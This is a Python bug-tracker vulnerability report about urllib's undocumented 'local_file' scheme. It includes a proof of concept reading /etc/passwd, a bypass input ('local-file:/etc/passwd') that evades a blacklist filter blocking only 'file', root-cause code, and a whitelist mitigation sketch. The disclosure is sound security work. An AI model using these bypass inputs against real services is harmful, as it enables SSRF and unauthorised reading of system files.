
Author push0ebp
Recipients push0ebp
Date 2019-02-06.08:19:50
Message-id <1549441191.29.0.148559977828.issue35907@roundup.psfhosted.org>
Content
An unnecessary scheme exists in urllib's urlopen()

When people want to stop urlopen() from reading the file system while it handles an HTTP request, they often filter the URL scheme as a defense against SSRF, like the request() function below.

# Vulnerability PoC
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
The result is:
##
# User Database
# 
# Note t


However, urlparse() cannot parse a scheme like this one, because the underscore is not a valid scheme character, so the scheme field comes back empty.
This is the parsed result:
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='', query='', fragment='')


def request(url):
    from urllib import urlopen
    from urlparse import urlparse

    # Blacklist-style filter: reject a missing scheme and the 'file' scheme only.
    result = urlparse(url)
    scheme = result.scheme
    if not scheme:
        return False  # raise Exception("Required scheme")
    if scheme == 'file':
        return False  # raise Exception("Don't open file")
    # Every other scheme reaches urlopen() unchanged.
    res = urlopen(url)
    content = res.read()
    print url, content[:30]
    return True

assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False

If they filter only file://, this SSRF mitigation can be bypassed in the following way:

assert request('local-file:/etc/passwd') == True
URL parsing also succeeds, so the scheme check is passed:
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='', query='', fragment='')
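
The difference between the two spellings can be checked without opening any file. The following is a minimal sketch, not part of the original report: parsed_scheme() is a hypothetical helper name, and the import fallback is only there so the snippet runs on both Python 2 and Python 3.

```python
try:
    from urllib.parse import urlparse  # Python 3
except ImportError:
    from urlparse import urlparse      # Python 2, as used in this report


def parsed_scheme(url):
    """Hypothetical helper: return the scheme urlparse() extracts ('' if none)."""
    return urlparse(url).scheme


# '_' is not a valid scheme character, so no scheme is recognised and a
# filter that requires a scheme rejects the URL.
underscore = parsed_scheme('local_file:/etc/passwd')

# '-' is a valid scheme character, so a scheme is recognised, and it is
# not equal to 'file', so a filter that blocks only 'file' lets it through.
hyphen = parsed_scheme('local-file:/etc/passwd')
```

Only the hyphenated spelling yields a non-empty scheme, which is why it passes both checks in request().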


# Attack scenario 
"local_file" is the unnecessary URL scheme.
Even if filtering is in place, an attacker can bypass it with this scheme and read arbitrary files.

# Root Cause

URLopener::open in urllib.py, from line 203:

name = 'open_' + urltype
self.type = urltype
name = name.replace('-', '_')  # this also lets 'local-file' through
if not hasattr(self, name):  # not taken: hasattr(URLopener, 'open_local_file') is True
    if proxy:
        return self.open_unknown_proxy(proxy, fullurl, data)
    else:
        return self.open_unknown(fullurl, data)
try:
    if data is None:
        return getattr(self, name)(url)
    else:
        return getattr(self, name)(url, data)  # calls URLopener::open_local_file
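
The dispatch pattern in this excerpt can be reproduced in isolation. The following is a minimal sketch under stated assumptions: ToyOpener is a hypothetical stand-in for URLopener, it splits the scheme with a simple partition() instead of urllib's own helpers, and its handlers return tuples instead of opening anything.

```python
class ToyOpener(object):
    """Hypothetical stand-in for URLopener; it never touches the file system."""

    def open(self, fullurl):
        # Simplified scheme split (assumption: the real code uses its own helper).
        urltype, _, rest = fullurl.partition(':')
        name = 'open_' + urltype
        name = name.replace('-', '_')  # 'local-file' becomes 'local_file'
        if not hasattr(self, name):
            return self.open_unknown(fullurl)
        # Any method named open_<scheme> is reachable from the URL.
        return getattr(self, name)(rest)

    def open_file(self, url):
        return ('file', url)

    def open_local_file(self, url):
        return ('local_file', url)

    def open_unknown(self, fullurl):
        return ('unknown', fullurl)


opener = ToyOpener()
via_hyphen = opener.open('local-file:/etc/passwd')
via_underscore = opener.open('local_file:/etc/passwd')
```

Both spellings end up in open_local_file, because the handler is chosen by method name rather than from a fixed list of supported schemes.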

This may be just a trick, because people usually use a whitelist (allowing only http or https).
However, anyone who uses a blacklist, such as filtering file://, is affected and can be exposed to SSRF.
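
For comparison, the whitelist approach mentioned above could look like the following. This is a minimal sketch, not taken from any library: ALLOWED_SCHEMES and is_allowed() are hypothetical names, and the check covers the scheme only, nothing else about the URL.

```python
try:
    from urllib.parse import urlparse  # Python 3
except ImportError:
    from urlparse import urlparse      # Python 2, as used in this report

# Assumed policy: only these schemes may be fetched.
ALLOWED_SCHEMES = frozenset(['http', 'https'])


def is_allowed(url):
    """Hypothetical check: accept the URL only if its parsed scheme is whitelisted."""
    return urlparse(url).scheme in ALLOWED_SCHEMES
```

With this check, file:, local-file: and local_file: URLs are all rejected, because none of them parses to http or https.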